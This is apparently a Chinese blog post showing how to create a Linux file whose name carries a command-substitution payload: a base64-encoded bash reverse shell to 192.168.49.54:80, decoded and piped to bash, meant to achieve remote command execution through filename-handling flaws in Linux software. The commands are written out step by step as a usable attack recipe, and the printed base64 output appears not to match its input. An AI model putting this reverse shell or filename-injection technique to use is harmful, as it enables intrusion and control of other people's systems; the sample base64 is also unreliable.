Linux下生成包含bash命令的文件名的文件

关于如何绕过Linux限制的其他方式请查看:

https://book.hacktricks.xyz/linux-hardening/bypass-bash-restrictions

我只是为了生成/创建包含bash命令的文件名而不是详细介绍Linux系统的文件命名规范,所以只需要考虑Linux系统文件命名的部分要求,文件名中的限制字符是我需要关注的,具体可以查看"限制字符"的链接。

1.可以使用大写和小写字母、数字、"."(点)和"_"(下划线)符号。

2.允许使用 \ 符号引用或转义空格、<、>、|、\、:、(、)、&、; 以及通配符(如 ? 和 *) 。

bash 复制代码
echo $\(echo `echo '/bin/bash -i >&/dev/tcp/192.168.49.54/80 0>&1'|base64`\|base64 -d\|bash\) 

这个命令中单引号中的/bin/bash -i >&/dev/tcp/192.168.49.54/80 0>&1是反弹shell的命令,也可以换成别的命令,这里的命令将会在之后被执行。

这条命令的输出类似这样:

bash 复制代码
$(echo LJpbi9iYXNoI1pID4m2Rldi90Y3AvMLjE2OC40S41NC84MCwPiYCg==|base64 -d|bash)

输出的命令进行这样的操作:输出一段base64的字符串,然后用base64工具解码,然后再把结果交给bash命令执行。这样做的好处是避免原来命令中包含特殊字符层层转义或者导致执行失败。

我现在要生成以这个输出作为文件名的文件,用echo ''> 文件名

bash 复制代码
echo '' > '$(echo LJpbi9iYXNoI1pID4m2Rldi90Y3AvMLjE2OC40S41NC84MCwPiYCg==|base64 -d|bash).jpg'

请注意,你完全可以不加文件名后缀.jpg,这在Linux中无关紧要。

下面这个图片里你能看到最终生成的文件名。

为什么要生成/创建这样的文件?

此文件将在某些Linux软件的漏洞中会被用来进行远程命令执行,这样的手段用来绕过Linux对文件名的限制。

相关推荐
wdfk_prog7 小时前
嵌入式面试真题第 10 题:高优化等级下共享状态可见性、内存模型与系统级同步设计
java·linux·开发语言·面试·职场和发展·架构·c
x-cmd8 小时前
Mac 涨价后,本地 AI 还能千元入门吗?
linux·人工智能·macos·ai·agent·amd·本地ai入门
摇滚侠15 小时前
Linux 零基础教程 09、11、77
linux·运维·服务器
嵌入式学习和实践17 小时前
嵌入式 Linux 调闭源 SDK 怕崩?用 dlopen 把第三方动态库库“隔离“起来
linux·三方库
小樱花的樱花18 小时前
Linux 多线程编程:互斥锁(Mutex)详解
linux·c语言·开发语言
麦兜和小可的舅舅18 小时前
从原理到实战:Linux 系统性能诊断核心指标全解析及生产系统故障分析复盘
大数据·linux·运维
mounter62519 小时前
质检员与超能引擎的碰撞:KASAN 护航 eBPF JIT 的技术演进与安全抉择
linux·ebpf·linux kernel·kernel·kasan
风123456789~19 小时前
【Linux专栏】history常用命令
linux·运维·服务器
熬夜苦读学习19 小时前
基于websocket的多用户五子棋网页游戏
linux·服务器·网络·websocket·网络协议·游戏·五子棋
fpcc20 小时前
Linux 7.1介绍
linux·运维